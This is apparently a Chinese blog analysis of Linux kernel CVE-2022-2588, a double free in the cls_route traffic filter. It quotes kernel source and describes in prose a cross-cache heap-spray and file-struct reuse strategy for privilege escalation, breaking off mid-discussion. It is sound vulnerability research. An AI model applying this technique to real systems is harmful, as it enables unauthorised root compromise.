CVE-2022-2588复现
196082 慢慢好起来

前言

本来不想分析CVE了,无奈前面提到了内核内部隔离机制,而在往期的文章中只在向pipe_buffer说yes! 文章中简要提到过通过实现页级的UAF来实现绕过的,可是还存在一种技术可以绕过,如果不记录下来是真的心痒,所以只能把syzkaller的学习计划往后推推进而来分析这一个利用方法。文件创建时间是10月19号,不想写文章了,懒狗症犯了

回到正题,这一漏洞出现在流量控制子系统包分类器的cls_route过滤器中,当旧过滤器的句柄为0时,在释放之前内核不会从哈希表中将其删除从而产生的Double Free。

Rtnetlink简述

这里直接抄我参考文章的原文,绝对不是我懒得写

Rtnetlink是所有内核网络子系统使用的网络连接总线,包括网络接口、路由、fdb和邻居。一些内核网络子系统也在通用netlink总线上提供服务。Linux内核网络子系统使用消息类型和系列向Rtnetlink内核注册处理程序。Rtnetlink允许读取和更改内核的路由表。它在内核中用于在各种子系统之间进行通信,也用于与用户空间程序进行通信。网络路由、IP地址、链接参数、邻居设置、排队规则、流量类别和数据包分类器都可以通过NETLINK_ROUTE套接字进行控制。Rtnetlink由以下消息类型组成(除了标准的netlink消息):

  • RTM_NEWLINK、RTM_DELLINK、RTM_GETLINK创建、删除或获取有关特定网络接口的信息。
  • RTM_NEWADDR、RTM_DELADDR、RTM_GETADDR添加、删除或接收有关与接口关联的IP地址的信息。
  • RTM_NEWROUTE、RTM_DELROUTE、RTM_GETROUTE创建、删除或接收有关网络路由的信息。
  • RTM_NEWNEIGH、RTM_DELNEIGH、RTM_GETNEIGH添加、删除或接收有关邻居表条目的信息(例如,ARP条目)。
  • RTM_NEWRULE、RTM_DELRULE、RTM_GETRULE添加、删除或检索路由规则。
  • RTM_NEWQDISC、RTM_DELQDISC、RTM_GETQDISC添加、删除或获取排队规则。
  • RTM_NEWTCLASS、RTM_DELTCLASS、RTM_GETTCLASS添加、删除或获取流量类别。
  • RTM_NEWTFILTER, RTM_DELTFILTER, RTM_GETTFILTER添加、删除或接收有关流量过滤器的信息。

实现原理

首先,当内核启动加载时会初始化netlink协议,此时会通过调用rtnetlink_init函数初始化路由netlink socket接口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
void __init rtnetlink_init(void)
{
if (register_pernet_subsys(&rtnetlink_net_ops))
panic("rtnetlink_init: cannot initialize rtnetlink\n");

register_netdevice_notifier(&rtnetlink_dev_notifier);

rtnl_register(PF_UNSPEC, RTM_GETLINK, rtnl_getlink,
rtnl_dump_ifinfo, 0);
rtnl_register(PF_UNSPEC, RTM_SETLINK, rtnl_setlink, NULL, 0);
rtnl_register(PF_UNSPEC, RTM_NEWLINK, rtnl_newlink, NULL, 0);
rtnl_register(PF_UNSPEC, RTM_DELLINK, rtnl_dellink, NULL, 0);

rtnl_register(PF_UNSPEC, RTM_GETADDR, NULL, rtnl_dump_all, 0);
rtnl_register(PF_UNSPEC, RTM_GETROUTE, NULL, rtnl_dump_all, 0);
rtnl_register(PF_UNSPEC, RTM_GETNETCONF, NULL, rtnl_dump_all, 0);

rtnl_register(PF_UNSPEC, RTM_NEWLINKPROP, rtnl_newlinkprop, NULL, 0);
rtnl_register(PF_UNSPEC, RTM_DELLINKPROP, rtnl_dellinkprop, NULL, 0);

rtnl_register(PF_BRIDGE, RTM_NEWNEIGH, rtnl_fdb_add, NULL, 0);
rtnl_register(PF_BRIDGE, RTM_DELNEIGH, rtnl_fdb_del, NULL,
RTNL_FLAG_BULK_DEL_SUPPORTED);
rtnl_register(PF_BRIDGE, RTM_GETNEIGH, rtnl_fdb_get, rtnl_fdb_dump, 0);

rtnl_register(PF_BRIDGE, RTM_GETLINK, NULL, rtnl_bridge_getlink, 0);
rtnl_register(PF_BRIDGE, RTM_DELLINK, rtnl_bridge_dellink, NULL, 0);
rtnl_register(PF_BRIDGE, RTM_SETLINK, rtnl_bridge_setlink, NULL, 0);

rtnl_register(PF_UNSPEC, RTM_GETSTATS, rtnl_stats_get, rtnl_stats_dump,
0);
rtnl_register(PF_UNSPEC, RTM_SETSTATS, rtnl_stats_set, NULL, 0);
}

由上面的代码可以看出来的,主要是通过rtnl_register函数将不同的消息类型和对应的操作进行了绑定,这里简单看一下这个函数定义

1
2
3
4
5
6
7
8
9
10
11
12
void rtnl_register(int protocol, int msgtype,
rtnl_doit_func doit, rtnl_dumpit_func dumpit,
unsigned int flags)
{
int err;

err = rtnl_register_internal(NULL, protocol, msgtype, doit, dumpit,
flags);
if (err)
pr_err("Unable to register rtnetlink message handler, "
"protocol = %d, message type = %d\n", protocol, msgtype);
}

可以发现这个函数其实就是rtnl_register_internal套了一层壳,这里主要关注rtnl_register的参数定义。前面就是协议,消息类型。紧随的这两个分别是两个毁掉函数被传入,而这两个毁掉函数对应的是两种类型,第一种是动作函数,第二种是dump函数dumpit,而从上面的初始化函数来看是有的消息只存在第一个有的只有第二个,还有的两者都有。从前面的简述中看到其实有的消息类型是没被初始化的比如RTM_NEWTFILTER,添加一个流量过滤器,其是在tc_filter_init函数中被初始化的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
static int __init tc_filter_init(void)
{
int err;

tc_filter_wq = alloc_ordered_workqueue("tc_filter_workqueue", 0);
if (!tc_filter_wq)
return -ENOMEM;

err = register_pernet_subsys(&tcf_net_ops);
if (err)
goto err_register_pernet_subsys;

rtnl_register(PF_UNSPEC, RTM_NEWTFILTER, tc_new_tfilter, NULL,
RTNL_FLAG_DOIT_UNLOCKED);
rtnl_register(PF_UNSPEC, RTM_DELTFILTER, tc_del_tfilter, NULL,
RTNL_FLAG_DOIT_UNLOCKED);
rtnl_register(PF_UNSPEC, RTM_GETTFILTER, tc_get_tfilter,
tc_dump_tfilter, RTNL_FLAG_DOIT_UNLOCKED);
rtnl_register(PF_UNSPEC, RTM_NEWCHAIN, tc_ctl_chain, NULL, 0);
rtnl_register(PF_UNSPEC, RTM_DELCHAIN, tc_ctl_chain, NULL, 0);
rtnl_register(PF_UNSPEC, RTM_GETCHAIN, tc_ctl_chain,
tc_dump_chain, 0);

return 0;

err_register_pernet_subsys:
destroy_workqueue(tc_filter_wq);
return err;
}

当用户通过NETLINK_ROUTE套接字发送RTM_NEWTFILTER消息用于创建一个流量过滤器时,内核会调用rtnetlink_rcv_msg函数来处理rtnetlink消息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
static int rtnetlink_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh,
struct netlink_ext_ack *extack)
{
struct net *net = sock_net(skb->sk);
struct rtnl_link *link;
enum rtnl_kinds kind;
struct module *owner;
int err = -EOPNOTSUPP;
rtnl_doit_func doit;
unsigned int flags;
int family;
int type;

type = nlh->nlmsg_type;
if (type > RTM_MAX)
return -EOPNOTSUPP;

type -= RTM_BASE;

/* All the messages must have at least 1 byte length */
if (nlmsg_len(nlh) < sizeof(struct rtgenmsg))
return 0;

family = ((struct rtgenmsg *)nlmsg_data(nlh))->rtgen_family;
kind = rtnl_msgtype_kind(type);

if (kind != RTNL_KIND_GET && !netlink_net_capable(skb, CAP_NET_ADMIN))
return -EPERM;

rcu_read_lock();
if (kind == RTNL_KIND_GET && (nlh->nlmsg_flags & NLM_F_DUMP)) {
struct sock *rtnl;
rtnl_dumpit_func dumpit;
u32 min_dump_alloc = 0;

link = rtnl_get_link(family, type);
if (!link || !link->dumpit) {
family = PF_UNSPEC;
link = rtnl_get_link(family, type);
if (!link || !link->dumpit)
goto err_unlock;
}
owner = link->owner;
dumpit = link->dumpit;

if (type == RTM_GETLINK - RTM_BASE)
min_dump_alloc = rtnl_calcit(skb, nlh);

err = 0;
/* need to do this before rcu_read_unlock() */
if (!try_module_get(owner))
err = -EPROTONOSUPPORT;

rcu_read_unlock();

rtnl = net->rtnl;
if (err == 0) {
struct netlink_dump_control c = {
.dump = dumpit,
.min_dump_alloc = min_dump_alloc,
.module = owner,
};
err = netlink_dump_start(rtnl, skb, nlh, &c);
/* netlink_dump_start() will keep a reference on
* module if dump is still in progress.
*/
module_put(owner);
}
return err;
}

link = rtnl_get_link(family, type);
if (!link || !link->doit) {
family = PF_UNSPEC;
link = rtnl_get_link(PF_UNSPEC, type);
if (!link || !link->doit)
goto out_unlock;
}

owner = link->owner;
if (!try_module_get(owner)) {
err = -EPROTONOSUPPORT;
goto out_unlock;
}

flags = link->flags;
if (kind == RTNL_KIND_DEL && (nlh->nlmsg_flags & NLM_F_BULK) &&
!(flags & RTNL_FLAG_BULK_DEL_SUPPORTED)) {
NL_SET_ERR_MSG(extack, "Bulk delete is not supported");
goto err_unlock;
}

if (flags & RTNL_FLAG_DOIT_UNLOCKED) {
doit = link->doit;
rcu_read_unlock();
if (doit)
err = doit(skb, nlh, extack);
module_put(owner);
return err;
}
rcu_read_unlock();

rtnl_lock();
link = rtnl_get_link(family, type);
if (link && link->doit)
err = link->doit(skb, nlh, extack);
rtnl_unlock();

module_put(owner);

return err;

out_unlock:
rcu_read_unlock();
return err;

err_unlock:
rcu_read_unlock();
return -EOPNOTSUPP;
}

可以看到函数的主要逻辑,首先是在消息中取出其familytype,紧接着根绝familytype回去到link。在最后调用link->doit(skb, nlh, extack),由前面的函数可以得知的是其会调用如下函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
static int tc_new_tfilter(struct sk_buff *skb, struct nlmsghdr *n,
struct netlink_ext_ack *extack)
{
struct net *net = sock_net(skb->sk);
struct nlattr *tca[TCA_MAX + 1];
char name[IFNAMSIZ];
struct tcmsg *t;
u32 protocol;
u32 prio;
bool prio_allocate;
u32 parent;
u32 chain_index;
struct Qdisc *q;
struct tcf_chain_info chain_info;
struct tcf_chain *chain;
struct tcf_block *block;
struct tcf_proto *tp;
unsigned long cl;
void *fh;
int err;
int tp_created;
bool rtnl_held = false;
u32 flags;

if (!netlink_ns_capable(skb, net->user_ns, CAP_NET_ADMIN))
return -EPERM;

replay:
tp_created = 0;

err = nlmsg_parse_deprecated(n, sizeof(*t), tca, TCA_MAX,
rtm_tca_policy, extack);
if (err < 0)
return err;

t = nlmsg_data(n);
protocol = TC_H_MIN(t->tcm_info);
prio = TC_H_MAJ(t->tcm_info);
prio_allocate = false;
parent = t->tcm_parent;
tp = NULL;
cl = 0;
block = NULL;
q = NULL;
chain = NULL;
flags = 0;

if (prio == 0) {
/* If no priority is provided by the user,
* we allocate one.
*/
if (n->nlmsg_flags & NLM_F_CREATE) {
prio = TC_H_MAKE(0x80000000U, 0U);
prio_allocate = true;
} else {
NL_SET_ERR_MSG(extack, "Invalid filter command with priority of zero");
return -ENOENT;
}
}

/* Find head of filter chain. */

err = __tcf_qdisc_find(net, &q, &parent, t->tcm_ifindex, false, extack);
if (err)
return err;

if (tcf_proto_check_kind(tca[TCA_KIND], name)) {
NL_SET_ERR_MSG(extack, "Specified TC filter name too long");
err = -EINVAL;
goto errout;
}

/* Take rtnl mutex if rtnl_held was set to true on previous iteration,
* block is shared (no qdisc found), qdisc is not unlocked, classifier
* type is not specified, classifier is not unlocked.
*/
if (rtnl_held ||
(q && !(q->ops->cl_ops->flags & QDISC_CLASS_OPS_DOIT_UNLOCKED)) ||
!tcf_proto_is_unlocked(name)) {
rtnl_held = true;
rtnl_lock();
}

err = __tcf_qdisc_cl_find(q, parent, &cl, t->tcm_ifindex, extack);
if (err)
goto errout;

block = __tcf_block_find(net, q, cl, t->tcm_ifindex, t->tcm_block_index,
extack);
if (IS_ERR(block)) {
err = PTR_ERR(block);
goto errout;
}
block->classid = parent;

chain_index = tca[TCA_CHAIN] ? nla_get_u32(tca[TCA_CHAIN]) : 0;
if (chain_index > TC_ACT_EXT_VAL_MASK) {
NL_SET_ERR_MSG(extack, "Specified chain index exceeds upper limit");
err = -EINVAL;
goto errout;
}
chain = tcf_chain_get(block, chain_index, true);
if (!chain) {
NL_SET_ERR_MSG(extack, "Cannot create specified filter chain");
err = -ENOMEM;
goto errout;
}

mutex_lock(&chain->filter_chain_lock);
tp = tcf_chain_tp_find(chain, &chain_info, protocol,
prio, prio_allocate);
if (IS_ERR(tp)) {
NL_SET_ERR_MSG(extack, "Filter with specified priority/protocol not found");
err = PTR_ERR(tp);
goto errout_locked;
}

if (tp == NULL) {
struct tcf_proto *tp_new = NULL;

if (chain->flushing) {
err = -EAGAIN;
goto errout_locked;
}

/* Proto-tcf does not exist, create new one */

if (tca[TCA_KIND] == NULL || !protocol) {
NL_SET_ERR_MSG(extack, "Filter kind and protocol must be specified");
err = -EINVAL;
goto errout_locked;
}

if (!(n->nlmsg_flags & NLM_F_CREATE)) {
NL_SET_ERR_MSG(extack, "Need both RTM_NEWTFILTER and NLM_F_CREATE to create a new filter");
err = -ENOENT;
goto errout_locked;
}

if (prio_allocate)
prio = tcf_auto_prio(tcf_chain_tp_prev(chain,
&chain_info));

mutex_unlock(&chain->filter_chain_lock);
tp_new = tcf_proto_create(name, protocol, prio, chain,
rtnl_held, extack);
if (IS_ERR(tp_new)) {
err = PTR_ERR(tp_new);
goto errout_tp;
}

tp_created = 1;
tp = tcf_chain_tp_insert_unique(chain, tp_new, protocol, prio,
rtnl_held);
if (IS_ERR(tp)) {
err = PTR_ERR(tp);
goto errout_tp;
}
} else {
mutex_unlock(&chain->filter_chain_lock);
}

if (tca[TCA_KIND] && nla_strcmp(tca[TCA_KIND], tp->ops->kind)) {
NL_SET_ERR_MSG(extack, "Specified filter kind does not match existing one");
err = -EINVAL;
goto errout;
}

fh = tp->ops->get(tp, t->tcm_handle);

if (!fh) {
if (!(n->nlmsg_flags & NLM_F_CREATE)) {
NL_SET_ERR_MSG(extack, "Need both RTM_NEWTFILTER and NLM_F_CREATE to create a new filter");
err = -ENOENT;
goto errout;
}
} else if (n->nlmsg_flags & NLM_F_EXCL) {
tfilter_put(tp, fh);
NL_SET_ERR_MSG(extack, "Filter already exists");
err = -EEXIST;
goto errout;
}

if (chain->tmplt_ops && chain->tmplt_ops != tp->ops) {
NL_SET_ERR_MSG(extack, "Chain template is set to a different filter kind");
err = -EINVAL;
goto errout;
}

if (!(n->nlmsg_flags & NLM_F_CREATE))
flags |= TCA_ACT_FLAGS_REPLACE;
if (!rtnl_held)
flags |= TCA_ACT_FLAGS_NO_RTNL;
err = tp->ops->change(net, skb, tp, cl, t->tcm_handle, tca, &fh,
flags, extack);
if (err == 0) {
tfilter_notify(net, skb, n, tp, block, q, parent, fh,
RTM_NEWTFILTER, false, rtnl_held);
tfilter_put(tp, fh);
/* q pointer is NULL for shared blocks */
if (q)
q->flags &= ~TCQ_F_CAN_BYPASS;
}

errout:
if (err && tp_created)
tcf_chain_tp_delete_empty(chain, tp, rtnl_held, NULL);
errout_tp:
if (chain) {
if (tp && !IS_ERR(tp))
tcf_proto_put(tp, rtnl_held, NULL);
if (!tp_created)
tcf_chain_put(chain);
}
tcf_block_release(q, block, rtnl_held);

if (rtnl_held)
rtnl_unlock();

if (err == -EAGAIN) {
/* Take rtnl lock in case EAGAIN is caused by concurrent flush
* of target chain.
*/
rtnl_held = true;
/* Replay the request. */
goto replay;
}
return err;

errout_locked:
mutex_unlock(&chain->filter_chain_lock);
goto errout;
}

这里简单说一下上面函数的逻辑,首先通过tcf_proto_check_kind(tca[TCA_KIND], name)获取过滤器的名字,随后通过tp = tcf_chain_tp_find(chain, &chain_info, protocol, prio, prio_allocate)获取指定协议的过滤器tp,如果tp为null则会创建新的tp,这里通过tp_new = tcf_proto_create(name, protocol, prio, chain, rtnl_held, extack);函数进行创建

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
static struct tcf_proto *tcf_proto_create(const char *kind, u32 protocol,
u32 prio, struct tcf_chain *chain,
bool rtnl_held,
struct netlink_ext_ack *extack)
{
struct tcf_proto *tp;
int err;

tp = kzalloc(sizeof(*tp), GFP_KERNEL);
if (!tp)
return ERR_PTR(-ENOBUFS);

tp->ops = tcf_proto_lookup_ops(kind, rtnl_held, extack);
if (IS_ERR(tp->ops)) {
err = PTR_ERR(tp->ops);
goto errout;
}
tp->classify = tp->ops->classify;
tp->protocol = protocol;
tp->prio = prio;
tp->chain = chain;
spin_lock_init(&tp->lock);
refcount_set(&tp->refcnt, 1);

err = tp->ops->init(tp);
if (err) {
module_put(tp->ops->owner);
goto errout;
}
return tp;

errout:
kfree(tp);
return ERR_PTR(err);
}

首先是为tp分配了一个object随后通过tcf_proto_lookup_ops函数根据kind获取到对应的ops

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static const struct tcf_proto_ops *__tcf_proto_lookup_ops(const char *kind)
{
const struct tcf_proto_ops *t, *res = NULL;

if (kind) {
read_lock(&cls_mod_lock);
list_for_each_entry(t, &tcf_proto_base, head) {
if (strcmp(kind, t->kind) == 0) {
if (try_module_get(t->owner))
res = t;
break;
}
}
read_unlock(&cls_mod_lock);
}
return res;
}

这里以route为例子

1
2
3
4
5
6
7
8
9
10
11
12
13
static struct tcf_proto_ops cls_route4_ops __read_mostly = {
.kind = "route",
.classify = route4_classify,
.init = route4_init,
.destroy = route4_destroy,
.get = route4_get,
.change = route4_change,
.delete = route4_delete,
.walk = route4_walk,
.dump = route4_dump,
.bind_class = route4_bind_class,
.owner = THIS_MODULE,
};

上面的ops将会获得如上cls_route4_ops结构体随后会调用tp->ops->init(tp)进行初始化

1
2
3
4
5
6
7
8
9
10
11
static int route4_init(struct tcf_proto *tp)
{
struct route4_head *head;

head = kzalloc(sizeof(struct route4_head), GFP_KERNEL);
if (head == NULL)
return -ENOBUFS;

rcu_assign_pointer(tp->root, head);
return 0;
}

可以看到该函数会生成一个route4_head结构体,此结构体的作用是用于存放过滤器对应的哈希值。

接着回到tc_new_tfilter函数,其会将新生成的tp加入到chain中。接下来就会通过fh = tp->ops->get(tp, t->tcm_handle)语句调用对应的get函数,根据tcm_handle获取到过滤器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
static void *route4_get(struct tcf_proto *tp, u32 handle)
{
struct route4_head *head = rtnl_dereference(tp->root);
struct route4_bucket *b;
struct route4_filter *f;
unsigned int h1, h2;

h1 = to_hash(handle);
if (h1 > 256)
return NULL;

h2 = from_hash(handle >> 16);
if (h2 > 32)
return NULL;

b = rtnl_dereference(head->table[h1]);
if (b) {
for (f = rtnl_dereference(b->ht[h2]);
f;
f = rtnl_dereference(f->next))
if (f->handle == handle)
return f;
}
return NULL;
}

这里会根据handleroute4_head链表中获取对应的route4_filter。如果返回为空,会接着进入到tc_new_tfilter函数的后续流程,最终在tp->ops->change(net, skb, tp, cl, t->tcm_handle, tca, &fh, flags, extack)语句调用change函数创建一个新的过滤器。

漏洞分析

漏洞出现在route4_change函数中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
static int route4_change(struct net *net, struct sk_buff *in_skb,
struct tcf_proto *tp, unsigned long base, u32 handle,
struct nlattr **tca, void **arg, u32 flags,
struct netlink_ext_ack *extack)
{
struct route4_head *head = rtnl_dereference(tp->root);
struct route4_filter __rcu **fp;
struct route4_filter *fold, *f1, *pfp, *f = NULL;
struct route4_bucket *b;
struct nlattr *opt = tca[TCA_OPTIONS];
struct nlattr *tb[TCA_ROUTE4_MAX + 1];
unsigned int h, th;
int err;
bool new = true;

if (opt == NULL)
return handle ? -EINVAL : 0;

err = nla_parse_nested_deprecated(tb, TCA_ROUTE4_MAX, opt,
route4_policy, NULL);
if (err < 0)
return err;

fold = *arg;
if (fold && handle && fold->handle != handle)
return -EINVAL;

err = -ENOBUFS;
f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL);
if (!f)
goto errout;

err = tcf_exts_init(&f->exts, net, TCA_ROUTE4_ACT, TCA_ROUTE4_POLICE);
if (err < 0)
goto errout;

if (fold) {
f->id = fold->id;
f->iif = fold->iif;
f->res = fold->res;
f->handle = fold->handle;

f->tp = fold->tp;
f->bkt = fold->bkt;
new = false;
}

err = route4_set_parms(net, tp, base, f, handle, head, tb,
tca[TCA_RATE], new, flags, extack);
if (err < 0)
goto errout;

h = from_hash(f->handle >> 16);
fp = &f->bkt->ht[h];
for (pfp = rtnl_dereference(*fp);
(f1 = rtnl_dereference(*fp)) != NULL;
fp = &f1->next)
if (f->handle < f1->handle)
break;

tcf_block_netif_keep_dst(tp->chain->block);
rcu_assign_pointer(f->next, f1);
rcu_assign_pointer(*fp, f);

if (fold && fold->handle && f->handle != fold->handle) {
th = to_hash(fold->handle);
h = from_hash(fold->handle >> 16);
b = rtnl_dereference(head->table[th]);
if (b) {
fp = &b->ht[h];
for (pfp = rtnl_dereference(*fp); pfp;
fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
if (pfp == fold) {
rcu_assign_pointer(*fp, fold->next);
break;
}
}
}
}

route4_reset_fastmap(head);
*arg = f;
if (fold) {
tcf_unbind_filter(tp, &fold->res);
tcf_exts_get_net(&fold->exts);
tcf_queue_work(&fold->rwork, route4_delete_filter_work);
}
return 0;

errout:
if (f)
tcf_exts_destroy(&f->exts);
kfree(f);
return err;
}

简单分析一下,这里会进一步解析数据包,通过fold = *arg;语句拿出route4_filter,然后判断是否存在,是否handlehandle是否一致,因为是第一次创建这里的fold为空。接着会通过f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL)创建一个结构体,并对其调用tcf_exts_init函数进行初始化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static inline int tcf_exts_init(struct tcf_exts *exts, struct net *net,
int action, int police)
{
#ifdef CONFIG_NET_CLS_ACT
exts->type = 0;
exts->nr_actions = 0;
/* Note: we do not own yet a reference on net.
* This reference might be taken later from tcf_exts_get_net().
*/
exts->net = net;
exts->actions = kcalloc(TCA_ACT_MAX_PRIO, sizeof(struct tc_action *),
GFP_KERNEL);
if (!exts->actions)
return -ENOMEM;
#endif
exts->action = action;
exts->police = police;
return 0;
}

从上述看书可以看到如果内核开启了CONFIG_NET_CLS_ACT选项就会对其分配actions成员,分配的大小是256字节。完毕之后回到route4_change中,如果fold存在,则会将其数据域复制给f。随后调用route4_set_parms函数设置其他参数,后面将新创建的route4_filter的hash值放到对应的route4_head中。

接下来进入if (fold && fold->handle && f->handle != fold->handle) {分支中删除掉旧的route4_filter的哈希值,当然在第一次运行时这里是不会进入的。

在最后判断fold是否为空,如果不为空则调用tcf_queue_work函数对其进行释放操作

1
2
3
4
5
6
bool tcf_queue_work(struct rcu_work *rwork, work_func_t func)
{
INIT_RCU_WORK(rwork, func);
return queue_rcu_work(tc_filter_wq, rwork);
}
EXPORT_SYMBOL(tcf_queue_work);

这个函数是个rcu回调,这里就看他的回调函数即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
static void __route4_delete_filter(struct route4_filter *f)
{
tcf_exts_destroy(&f->exts);
tcf_exts_put_net(&f->exts);
kfree(f);
}

static void route4_delete_filter_work(struct work_struct *work)
{
struct route4_filter *f = container_of(to_rcu_work(work),
struct route4_filter,
rwork);
rtnl_lock();
__route4_delete_filter(f);
rtnl_unlock();
}

可以其函数实现就是删除对应的成员之后删除掉f

通过上述流程看起来还是蛮正常的,这里出现问题的地方在清除hash和最后释放结构体的if条件不一致导致的。可以注意到的是在前面清楚哈希值时会判断其handle是否存在,如果不存在则不会进入。但是后面只是判断了fold是否存在,如果我们创建一个handle为0的过滤器则不会进入到上面的分支中只会进入到下面的分支中,从而导致其索引还残留在route4_head中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
static int route4_delete(struct tcf_proto *tp, void *arg, bool *last,
bool rtnl_held, struct netlink_ext_ack *extack)
{
struct route4_head *head = rtnl_dereference(tp->root);
struct route4_filter *f = arg;
struct route4_filter __rcu **fp;
struct route4_filter *nf;
struct route4_bucket *b;
unsigned int h = 0;
int i, h1;

if (!head || !f)
return -EINVAL;

h = f->handle;
b = f->bkt;

fp = &b->ht[from_hash(h >> 16)];
for (nf = rtnl_dereference(*fp); nf;
fp = &nf->next, nf = rtnl_dereference(*fp)) {
if (nf == f) {
/* unlink it */
RCU_INIT_POINTER(*fp, rtnl_dereference(f->next));

/* Remove any fastmap lookups that might ref filter
* notice we unlink'd the filter so we can't get it
* back in the fastmap.
*/
route4_reset_fastmap(head);

/* Delete it */
tcf_unbind_filter(tp, &f->res);
tcf_exts_get_net(&f->exts);
tcf_queue_work(&f->rwork, route4_delete_filter_work);

/* Strip RTNL protected tree */
for (i = 0; i <= 32; i++) {
struct route4_filter *rt;

rt = rtnl_dereference(b->ht[i]);
if (rt)
goto out;
}

/* OK, session has no flows */
RCU_INIT_POINTER(head->table[to_hash(h)], NULL);
kfree_rcu(b, rcu);
break;
}
}

out:
*last = true;
for (h1 = 0; h1 <= 256; h1++) {
if (rcu_access_pointer(head->table[h1])) {
*last = false;
break;
}
}

return 0;
}

这里再次关注ops中的route4_delete函数,这个函数的作用是释放所有的过滤器,这里使用的依旧是route4_delete_filter_work函数进行删除的,由于前面提到的route4_head中仍然残存handle为0的过滤器的哈希值,因此会对route4_filterroute4_filter->exts->actions对象存在double free

漏洞利用

(这里的利用机制我没有在文章中提过,但等我看完了发现我以前在适配CVE-2023-3269的时候学过T_T,属于是白忙活一场了)

既然以前的文章中没提到这里就详细介绍一下,既然这篇文章介绍了那就不再写今年那个CVE的分析文章了。

cross-cache

在前面提到,这一利用手法是用于解决内核内部隔离存在的,在CVE-2023-3269的这篇文章中则是用于绕过NUMA机制使用的,只不过在StackRot利用条件更为苛刻,在把这一手法讲解完毕之后简单提一下。

在前面的一篇文章中详细的解释了内核中的内部隔离机制,大家应该也已经知道了GFP_KERNEL_ACCOUNT标识位和GFP_KERNEL标识位去申请object的时候会从不同的cache中去取。

说到本篇文章,我们前面提到的可以对两个对象进行Double free,其分别是route4_filterroute4_filter->exts->actions,这里主要关注他们的大小,其分别是144和256,会从不同的cache中去取,分别是kmalloc-192kmalloc-256。而在内核的默认配置中file结构体的大小正好为256,自然而然可以联想到,如果首先使用一个可写的文件占据此位置,再释放掉再使用我们目标的文件去占取再通过某些手法是否可以达成类似于dirty pipe一样的效果呢?

这里先不考虑后续写的手法,从开始用file结构体开始考虑就会发现内核在分配file结构体时会从一个专属的缓存中取出(类似于cred结构体的分配),所以这时就不得不考虑cross_cache了。

众所周知,在内核中管理内存方式主要是两种一是slub用于分配较小的object,其次是buddy system机制用于分配页面。当某一个slab page被释放时会被buddy system回收,在后续的某个时间可能会被重用,然而重用就可能导致不同的cache从同一个页中取出了用一个位置的object交由其他内容使用。而cross-cache利用方法则是利用上述这一机制进行的,当某一slab page中的所有内存槽被释放,那么这个slab page会被强制释放给buddy system,此时如果堆喷另一种类型的对象且其对应的缓存耗尽则会向buddy system申请新的内存页,如果恰好使用了我们前面恶意强制释放的slab page则可实现攻击。(此处的重用机制在下文有详解,为什么不在这写是因为下面分析CVE是我临时起意的)

将此方法运用到这一环境中很容易可以想到首先通过大量堆喷basic_filter结构体完成内存布局,随后分配一个route4_filter结构体随后继续堆喷basic_filter结构体,那么此时就很有可能一个页面中只存在basic_filter->exts->actionsroute4_filter->exts->actions,如果控制将这个页面中的结构体对应basic_filterroute4_filter全部释放掉那么这个页面则会被强制释放进入buddy system中。再堆喷大量的正常文件使其成功占领我的UAF object,至此我们仍不知道到底是什么位置或是那个文件描述符占据了我们目标位置,所以这里使用漏洞产生double free再一次堆喷大量正常文件来占据刚刚的空洞,随后通过kcmp系统调用即可找到我们共享文件描述符的位置了。

延长时间窗口

前面只提到了可以找到共享文件描述符的位置了,没有继续往后写了,因为这里会遇到一个新的问题了,这里先讲后续的步骤写出来。

首先,我们已经拿到了目标文件描述符,并且是两个,那我们可以依照常识进行尝试就是我们对其中一个文件描述符中进行写入,对另一个文件描述符写入恶意字符,此时再将两个文件描述符都关闭( 因为都在使用所以此处的引用计数器为2 ),此时再大量堆喷去打开目标特权文件,有一定的几率让特权文件的file结构体会覆盖掉原本的空洞,从而导致后面的恶意字符写入到了特权文件中去了。

